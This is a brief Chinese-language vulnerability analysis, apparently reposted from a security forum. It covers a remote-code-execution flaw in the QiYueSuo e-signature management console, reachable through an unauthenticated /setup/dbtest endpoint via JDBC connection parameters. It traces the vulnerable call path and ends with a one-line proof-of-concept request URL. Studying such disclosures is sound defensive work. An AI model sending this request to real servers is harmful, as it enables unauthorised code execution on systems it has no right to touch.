聲明：該文章來(lái)自（安全白白）版權(quán)由原作者所有，K2OS渲染引擎提供網(wǎng)頁(yè)加速服務(wù)。

契約鎖分為三塊服務(wù)：電子簽約簽署平臺(tái)、電子簽約管理控制臺(tái)、電子簽約開(kāi)放平臺(tái)，下面分析的漏洞是來(lái)自于電子簽約管理控制臺(tái)。

com.qiyuesuo.config.ConsoleConfiguration?這個(gè)類有定義前臺(tái)不需要鑒權(quán)的接口，其中就包含了此次漏洞的接口?/setup/dbtest

問(wèn)題入口點(diǎn)com.qiyuesuo.setup.SetupController#dbtest

幾個(gè)參數(shù)db?、?host?、port、name、username

com.qiyuesuo.setup.SetupService#check?方法

com.qiyuesuo.setup.SetupService#validateDatabase?方法

com.qiyuesuo.setup.SetupService#dbtest?方法

后面就是常見(jiàn)的JDBC調(diào)用了

內(nèi)置了幾個(gè)常見(jiàn)的數(shù)據(jù)庫(kù)驅(qū)動(dòng)，可以直接RCE

最后放一個(gè)poc

/api/setup/dbtest?db=POSTGRESQL&host=localhost&port=5511&username=root&name=jdbcurl

?

本文首發(fā)于先知社區(qū)：https://xz.aliyun.com/news

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級(jí)服務(wù)市場(chǎng)：https://www.ijiandao.com/